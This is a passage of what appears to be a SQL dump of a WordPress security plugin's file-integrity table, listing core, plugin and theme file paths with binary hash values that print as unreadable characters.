�ꬬ0�b���\0J��dczE�!(C��P','',0,'?'),('Z4<n?e�����','wp-content/plugins/wordfence/lib/wfConfig.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����k�P$f��','�ڷ�s,9��a�a�8�ˬ�<�+��p�ql�','',0,'?'),('Z9���}.��J��k=�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8I��\Z\n�ӣ�','i>z���R�@������k�W��6u�k�y�','',0,'?'),('ZA�P��z����','wp-includes/blocks/pullquote/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<���>~P���A,(','O�����\"��|E�-H�� ?�(`�����[�','',0,'?'),('ZD�:-h�${�ma�','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?զ�)X�?�N�','b�EԚ�B�#:�(�#�=_(�\Z���|��U�#�','',0,'?'),('ZY�<}���*a�F���','wp-content/plugins/wp-cerber/assets/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V��:d�b���EF�R','��z��kG��� �A�Kyh��b��a��h','',0,'?'),('Zp_Z	JI����q�m`','wp-content/plugins/wp-cerber/assets/flags/pa.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�Y]�v\"���','���.oC���]1%�lЕ�Ul��\Z������#','',0,'?'),('Zu�;�Z��cd��XJ�','wp-content/plugins/redirection/fileio/rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�B��j�{&PEl','7e����U��V�T&�/\'�8�ܫlӗ�v�ڛ','',0,'?'),('Zx��1�2K�Z�,��','wp-includes/customize/class-wp-customize-header-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�\0W>$����l�^ҳ','Qy(u�&���v�ӳ\'-�}�hՒ��X��t�','',0,'?'),('ZҌ�[��\nv���	F','wp-includes/SimplePie/gzdecode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rF<�\ZiǨu��','|��R\'gAE�ێ���q��q�T!��:�O0�_','',0,'?'),('Z��0s{�\0Gt��Z','wp-includes/blocks/categories/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V������mԈs�1','�vzT�o]��h!=�Ԭu�A�\n�t�:�#&.','',0,'?'),('Z�_\"��~�J�����','wp-includes/js/wp-custom-header.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����n��(F�̽�','e��>���WZ�]��m��l΁�j���ei','',0,'?'),('Z�~Y/l����*�&�','wp-content/plugins/wp-cerber/assets/flags/vn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f6J%��C���v,\nc','�_���1:�L��v�Q��ܺ�.����|','',0,'?'),('Z��я�ݒ��S�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�\Z^Z�HG�%�O�','�m���c�;�\ny㐲��0,�5���F|=�C','',0,'?'),('Z����� %/�Z�z9��','wp-admin/includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/a�ag�����','��	T+�ݟ���v$L�3���G��!�j��','',0,'?'),('Z�\0��Y���� æfg','wp-includes/js/crop/marqueeVert.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0���9��R���','K�cg$�e���2\\p�$�1z�����`CkJ�','',0,'?'),('Z�YS,w�]�½�-f{�','wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�n�r�)^�ٔ�mO','?	6��.��C�9�V�o�85�//�?���x','',0,'?'),('Z�*Է�!�\"E\Z�@','wp-includes/blocks/pullquote/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O)r���B\\���O��','��3B��>��t7~g� �8z�v��q�^g3�I>','',0,'?'),('Z�R���r(�&b��:�-','wp-includes/css/dist/format-library/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']0�J��b��C��EV','7|I����W�~�w�MO��Ҋ�d�V�pdⰃ','',0,'?'),('Z��=ӧ�rc\"��y�','wp-includes/IXR/class-IXR-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��VdB+A�J?��#','��{~�(#�\Z6u����,����?�jk2��`','',0,'?'),('[�G���e�a\'�i��','wp-includes/js/jquery/ui/datepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4P1,ٝ�`x����','�]w\'��d�<s��6�>4Sڭ���s��/�=��','',0,'?'),('[\'L�F�d�+���k','wp-content/plugins/wp-cerber/assets/flags/li.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�f�9�%��QZ!�;','�`A��/�\\) 5/�����簤��GJ���`�','',0,'?'),('[5���Y�Nh���K�M�','wp-includes/customize/class-wp-widget-area-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<w܌*�t���!�','44�w�Vv�Oa5G��39��I����=�5��i','',0,'?'),('[w�[ᄅ�\r	|2I�)','wp-content/plugins/wp-cerber/assets/flags/hu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C��.F��L\nc��Q','�g.XaMw�Ma-#lW���=���h��1�U�h','',0,'?'),('[��#ܧ\Z>]��<�','wp-admin/css/colors/ectoplasm/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@I��FY���[}%','tWX:H�?`?���\0-�pV-�85����L]p	','',0,'?'),('[�>�x�;�wn/t�H','wp-includes/js/wp-emoji.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('[�Psr@ܟ��e�#9s\Z','wp-content/plugins/redirection/locale/redirection-pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/bՕ-�/�\\?��','��\"_��Z\r��N�k񾵊�9��j�ȴR$P%i','',0,'?'),('[���1�YAdk�,','wp-includes/SimplePie/Sanitize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�l����fp��x��','���O\nQp���5�A�~������j��xt�','',0,'?'),('[�Y��44�Or��l0�','wp-includes/Requests/Exception/HTTP/414.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�r�Nf}�-��⽪','��H������i���c�!��I).eh������','',0,'?'),('[�BX\n��Q����c�','wp-includes/blocks/file/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|Um��^�Ģe��H}�','z�q��\Z�7\"%+�/,@O\0�	-�\ZM�H3�','',0,'?'),('[ꠏ�|K�o�یb7�','wp-admin/user/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xCS6�LC�2!�u�','�`K����y2M��plξ\"a\0אּ�t�ޡD','',0,'?'),('\\�%�?�>����e8','wp-includes/class-wp-block-pattern-categories-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W��t�\'����m@��','%�k2\'-n[��D�\"��jW�ً���.��!�','',0,'?'),('\\�����9�����','wp-admin/ms-upgrade-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qc��8���E�%��!','	�H�_c��Q�X��̤�ՏLs�ڭ�','',0,'?'),('\\H���:��u3�%�Fw','wp-content/plugins/wordfence/views/waf/waf-install-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�2�H���$�\n�','5�(�/��PhJS�Z\"&]}���r�Ip�(�-t��','',0,'?'),('\\[��i%Ͱ<��e�>�','wp-includes/css/wp-pointer-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b;���f�J-�',' \0��Drá�)�\Z�k��y�Q��h�q�.\nCK','',0,'?'),('\\e����i-��-�e','wp-content/plugins/redirection/redirection-strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w-3W�(_�A��fH','�B�<�o`��A�>���2��hN�֔��\n7','',0,'?'),('\\���mՀ����;�','wp-content/plugins/wp-cerber/assets/flags/eg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C�֙�x�8��\0 ','�_�ih��<�[������Ns�D}?\'��C�Y','',0,'?'),('\\������7���Q�o','wp-content/plugins/wordfence/css/images/ui-icons_cc0000_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��%;w���Q�8��@','wi>�6�Ƭ�4��.N�C���\Z�4�IO��','',0,'?'),('\\�т�?$�̈́8����','wp-admin/includes/dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���pj�\\�{wBz17','v���=d�QL��B\0��OBH���P\0���','',0,'?'),('\\�\0��>�+���Fb��','wp-admin/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�U��:#�+a���F','�C���f��`���]����|#wVÉBH)\r','',0,'?'),('\\ڋp�����I�T�6�','wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z^���/ǁ��.��','������x�9-��uNn��L���>��诜1SE','',0,'?'),('](R�&!��1;�3��','wp-includes/js/wp-ajax-response.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϗwf��$%�¬�fq	','���0ڬv��+��Jb_\'\0�!#�p六���','',0,'?'),(']B#�2�z��bU��/','wp-includes/Text/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),(']L0���eE�\"u� ��','wp-includes/js/mediaelement/mediaelement-migrate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),(']x��6�a�[�|��','wp-content/plugins/wp-cerber/assets/flags/sl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nU�r�̨�^̧\0�','h�+ѩEfp��\Z��tт�5�X���T:�K�6','',0,'?'),(']���N��Jjӎe���','wp-includes/widgets/class-wp-widget-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��v��2�%���h$','9��ڏ	w���z�e�u#Z<ty\Zc #\Z3','',0,'?'),(']���r�:@��I�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6:����2kP3���','%u���Mp����,.\0�@�Zq��r��/���Q','',0,'?'),(']��P���Tkvt��8A','wp-admin/network/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ż\Z�=>� ɱ�l�','y�TQmU��z�D��s�g���1^T\"�ig�I','',0,'?'),(']���*������J�','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��E��H)�.��','��& �qC1QU�_.O��3����1!&��۴��','',0,'?'),(']����\"}[�Y�R�','wp-admin/css/edit-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5F	�wYM.��\r!&�-','n>ďJ�X��������6\\CŰ���is�','',0,'?'),(']�D�d���3��3�t�','wp-content/plugins/wp-cerber/assets/flags/hr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZO��e.��.�o','e��T��\\��B;vu��!�\0~\" P��;�','',0,'?'),(']�9�h\n��w6�}��U','wp-content/themes/newsmagbd/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�F0d�!��d=�7�','EU�)�B��ι���Q�Q]_���Mw���','',0,'?'),(']�4d�9���C�<s�3','wp-includes/blocks/video/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Tv��H��ό�','�g���C-����-�}���	���A�Q�','',0,'?'),('^�4�j�|��I��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�H*f��$��ʝӐ','���Ɲic�z�P��1�\"ݢӛo�TWry�*F','',0,'?'),('^��=Cw4��w���J','wp-content/plugins/redirection/locale/json/redirection-ru_RU.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_Q(��>xC1��|�','džS����#:NϤ��~��&ͬdmS�','',0,'?'),('^v��_	�\\,�>��','wp-content/themes/newsmagbd/inc/filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*��̞>��','t��<b��<�\nH�-�ה�%�$�\Z�e�R�','',0,'?'),('^9(-(Ų�y ���0q*','wp-admin/user/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�N ����9�3nDl','r���R89�<�;9i1l�Z���Q��oC#�Y��','',0,'?'),('^@ղ{\'��_���92','wp-admin/upgrade-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���[a�@1.��Q��Z','�tˁ�����9{��/��y�g1\'�uV��l�','',0,'?'),('^H\0�B|��4�@z��','wp-includes/IXR/class-IXR-error.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g6\"���u\\\'3����b�','*?�ۧU�=�?�,]��0=C����Z-�6Dq.�G','',0,'?'),('^U�.i��ypG���','wp-includes/js/mediaelement/mediaelementplayer-legacy.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('^d?e��.o���ʨ�L','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-below-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�C�=sy3�L���','�_��o3�t�Y��_o��f2k#��0�6Ps;','',0,'?'),('^yG=ڜFg;3�á�','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��RC���Ty�?�','D����H�~����Ϩ�P�_�{�!��','',0,'?'),('^�Ð��+�y|�','wp-includes/images/crystal/spreadsheet.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�9�Т1�T��n��','e\rC��i0��[��R�8@���G���aJN�','',0,'?'),('^���)C�`�4�z','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-hu_HU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	*\'�\'F���','vRK��(\'�]�\"[)����H�	v	.,}�','',0,'?'),('^�ZG:��}\"E��**$','wp-content/plugins/redirection/api/api-log.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�T۫�ж�����','�F���<��`��D�����O��]��S��','',0,'?'),('^��u�u��W�d�M=�','wp-content/plugins/wordfence/crypto/vendor/composer/platform_check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=E�o0��[�','�m?\Z�\"�g��=�0�N\"��Q��`�u\'��~I','',0,'?'),('^�^\\Q��=(w��','wp-includes/js/imagesloaded.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Vu+sf5�i����','����4H��1�Pc���)C6c�D�aHum\Z#cV','',0,'?'),('^�\r6&�ҖF;��oB','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P%S�%<��?�\Z��\\','gO�:!��rh��ʀ6�\'wf��D���z�','',0,'?'),('_�\0��d �MP~��D','wp-includes/revision.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�B�b{�\r��8�','NL�q���L�h��x⺾K^�Aъ�Dy�W���','',0,'?'),('_�k4�!*}��݄ ','wp-content/plugins/wordfence/vendor/composer/ClassLoader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����|%��*T*�`�','�����289v�u3�n	C2�s��va/�','',0,'?'),('_*�⽞L�0�>\r','wp-includes/feed-rss2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lN+�5	��O?','�@!�`C��*Me��z�j@	�@���L�jw�','',0,'?'),('_�#��U1p�GS�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���rt��w��(�e','�ҿD�I<�^�i2dW�]G�_�-+�A8�W','',0,'?'),('_/dyY�\r�}$ʓ��','wp-content/plugins/wp-cerber/assets/flags/ni.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�MZsu���/��','�Cd0���HF|�\ne��ʅ�p�_�SӲ@\0@1<ۊ','',0,'?'),('_d1@�_9��,���p','wp-includes/blocks/tag-cloud/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':%B��R\n6���\'J','L�Y5��{�L�Il#6M�XH�xP!\'��+�m\"��','',0,'?'),('_j��_��/���yӱ','wp-includes/load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':G������F��9�;3','���T0�\0�:�j���Ov	�8p.��~���ms�Q','',0,'?'),('_�f�>��*��_\n','wp-content/plugins/wp-cerber/assets/flags/ru.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q���j�/�53\r�','�z\rf�/���x�.��5Q&i�HCn�0�','',0,'?'),('_�O�$^����5��','wp-content/plugins/wp-cerber/assets/ui-stack.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#`LZ)�pd��','Ɉ���H���R�{(~\0*8���!�^�u�','',0,'?'),('_�|��T�M^���J','wp-includes/css/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��($c��g2��P��','�E� j\Z̅�9�,{\0�����wEk�Ճ��V�','',0,'?'),('_��4�3���=��','wp-includes/images/uploader-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\M�����m��','�p����+/������i��!Z�ţ6�m�','',0,'?'),('_�(�C���M6�9�','wp-admin/includes/class-wp-links-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�6�Z3@][:����+','A���D��c?��L���I�OB��Oß��L','',0,'?'),('_����8}���?�','wp-includes/css/media-views-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&���b���ۥ=','[Z�������Y���B6ܸ����\05���','',0,'?'),('_��2o���U���E6','wp-includes/blocks/query-pagination-next.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�a�O��шȻ�','������ʶ�u@�)���mP����2�o�\r$','',0,'?'),('`��S�`NI�^G�','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�i@�G�g��0�p','G��<�/�14Ņ�L��5�������!','',0,'?'),('`%�ֽ�j��\'��P��','wp-admin/js/edit-comments.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L����e�\n�t�','�ǖ$��ªrO$w\0���rȕKd�71��','',0,'?'),('`5�ƙy�5_P�XI�','wp-content/plugins/redirection/locale/redirection-zh_TW.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\n�	cvh���S-�m','\\�O����%e������\'�wF��=��','',0,'?'),('`Bd3� C�j�3��n','wp-includes/blocks/verse/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.��\Z���J�.�c����','!�wN��.v���v�8[�DW�	$�_��W55','',0,'?'),('`��gf�W�\n&OPw','wp-content/plugins/wp-cerber/assets/flags/sg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*F��Y����K�	a','Ԩ��Vm�f��Ek$��;]N_q�^�4����(�','',0,'?'),('`��N2E�ᆴ��pC�','wp-admin/images/privacy.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W(*/�E�;�G{��','�;n0|:������,�2����X6V�B5y�Q�','',0,'?'),('`��\n���2����','wp-admin/css/code-editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V��DBQVgF','w��86=�ݔ����2�\rD%V��E5�S�	�T�','',0,'?'),('`�[��$a��[�RO��','wp-content/plugins/redirection/models/importer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�&ۦ�\n�\0n.[',':�k��8�*��Ϸ\0qh���2��8B�h','',0,'?'),('`���#��Q�?>6)','wp-content/plugins/wp-cerber/assets/flags/fk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�OwB<����oa9�E�','�k��؊�2��M&C9�&0d�Hl��q~9q','',0,'?'),('`�a�(�g��\"��','wp-includes/js/dist/html-entities.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r��(�%�kc[�Nd','#(�u0�Em�&�;�Nj�n�O��)\Z�b5�B�4','',0,'?'),('`�c0���\\���3�','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	>�U6ƪg��v�f','R�&sX$6#���_��ν�J�|�b0�o','',0,'?'),('`���;�\"�-���+~;','wp-includes/js/tinymce/plugins/media/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#@,�4dG��M','XHx����0�֍X�\Z���OG��|�{�F2','',0,'?'),('`�}+�6�L-q[��$','wp-includes/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1�`���0�����','�qƖ����%/�y�g�rwÛ�\r�LR>=Y','',0,'?'),('`��U�2���mdW','wp-includes/class-wp-customize-nav-menus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�@�V�@��\0�*','ce�ȑOtԚB[�/)��H�@c^�7�8�ϱ�','',0,'?'),('a�)6����ю�','wp-includes/js/plupload/moxie.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#C\r��5DZ�ǒ����','����I�9_/x�t5���(�.g�tT\Z}&���','',0,'?'),('a)�TMW�Oo��Q�|�','wp-admin/images/media-button.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6@p�z^ye��','_\Z���SjזY ����V�Z��Gen�_','',0,'?'),('a\\c,I\"5T��#̋�','wp-admin/images/media-button-music.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4^&$o��uf&�','�wWd¼8P�F6�A����ܴ�to-��X\\��a$','',0,'?'),('a�w�U��\ZTz�K�','wp-includes/blocks/post-excerpt/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��)\0Ь�/o','F�+h���p��a�qÉ�Fb�A�3i�<��','',0,'?'),('a�?��_�ˢ��6j��X','readme.html',0,'\\_����A3�v�AEy�[','\\_����A3�v�AEy�[','\'1\'��Q}	$��v^���[oyTG�I7Hg��','',0,'?'),('a�J��r���&�-D�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��o��}S}���8.','�$��s�����?;f�Ġ=`\r�	��&��!','',0,'?'),('a����(m�EB�l�','wp-includes/media-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P?�)S�͠�Y��;�','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('a�c�CH\r��=l@ĸ','wp-admin/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�D���w�o��}�D','	e�S�\nyp|Y��*h�.���ѽ⿞�ʆX','',0,'?'),('a�ai�G����}��\Z �','wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8	*�GPU.B��l�B','D�K�r#�,COx�����*,2A<�>B�6SH','',0,'?'),('a�&S���T�\"�l�9','wp-content/plugins/wp-cerber/assets/inspector.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zn�d���*k��P�j','�	�o���7Xv�o\ZC�D�j����p��','',0,'?'),('a��-�b��$G�Ι','wp-content/plugins/wp-cerber/assets/flags/sh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U�{ͤ�:u�d�','�R<,l��I@�X�ߠ.#pF�g�%1O���6�','',0,'?'),('b�&ga\0���o��','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Mono_500.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��E@_*Fr�b-�w�','�=3�)n��r��l\\!H�0\0�Q���\'���w^','',0,'?'),('b\"^c�.V(�z���q','wp-content/plugins/redirection/locale/redirection-es_MX.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^}�)6���J�b','�����Tws���_u=ɒ�\rϴ���nR���I2','',0,'?'),('bY�,��ϥY�r۝�;�','wp-includes/js/crop/cropper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ky5�ni*M(��','�ٸ�T��ޝO���wL��y=}�gTl������','',0,'?'),('bdB��դ��Z�O�','wp-content/plugins/redirection/database/schema/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e^��&Q�C�O�','o�\"��+���?l��B��WSypۢ�X��e�l','',0,'?'),('b���9���GQE��ґ','wp-content/plugins/wp-cerber/assets/flags/lv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���JqW6A���`>','�\0���jn!-xv��+u�j��D���<�7!�5�#','',0,'?'),('b���.ӛ����','wp-content/plugins/wp-cerber/assets/flags/om.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r]-�K��K<ݳ�8�','�;�8K�KI�k�O�[��\0v�U[JR$ ��','',0,'?'),('b���HzfW����gw�','wp-content/plugins/wordfence/lib/wfSchema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�@����	�|���O�','g�v����K%��oiS�7�.�]�siH��2:p','',0,'?'),('b���Ҍ &�?�{','wp-includes/js/customize-loader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F꡻�S)8�׆>]�','',0,'?'),('b�+ƴݟ�3�','wp-includes/customize/class-wp-customize-nav-menu-location-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��U!��s^�7�L',';��lϓ�b^�����0�(�@�L�#B��','',0,'?'),('b񪥲K�+x����wF','wp-admin/css/site-health.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$f�*������@�Y','�㰳\\0�|V�FQT�_J��K�k:G���Vǚ���','',0,'?'),('c餟��(Ok1�!͂','wp-admin/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��Gq������','�j\Z%x�B�]{Lּ]*���ļ1IC;.�6�V','',0,'?'),('c�4L]�˞��Mc','wp-admin/includes/class-wp-post-comments-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@d�B��#�&&��','{��bk��\r���}�	{=��\\�=6�`l��	','',0,'?'),('c‹���p	�PU3/�','wp-content/plugins/wordfence/modules/login-security/classes/model/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&ܮM���,~/���r','F;���W]��&��z~o\'�/��q�+��','',0,'?'),('c%�;8�QVWƝdȇ�:','wp-includes/blocks/paragraph/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e|�LO4��a$QDo��','��W� +�b���N��ܶ��\\�S�u(}��','',0,'?'),('c+=�υ��E���e','wp-content/plugins/redirection/locale/json/redirection-en_ZA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�u�I�\\� ɮ�s','19��Qs���&�l�ƨ.�*�\rn�>��0���','',0,'?'),('c,���[xޫ�3�\n�@','wp-includes/js/jquery/jquery.masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@`���&n|�}A��','�\\ۙ����	}M�g� �$�0� [���B','',0,'?'),('c42j���x�c��d','wp-includes/Requests/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�|;��UE�*��{Y','��^���	nt�\"V8�M@�H؟Q��[S$','',0,'?'),('c4eP����yАx	','wp-content/themes/newsmagbd/template-parts/single/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h�c���i��FZ','�>�s����!�)N)�t�o��`W|e�cffl�N�','',0,'?'),('ct�ש�X�پ�u�yv','wp-includes/blocks/image/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	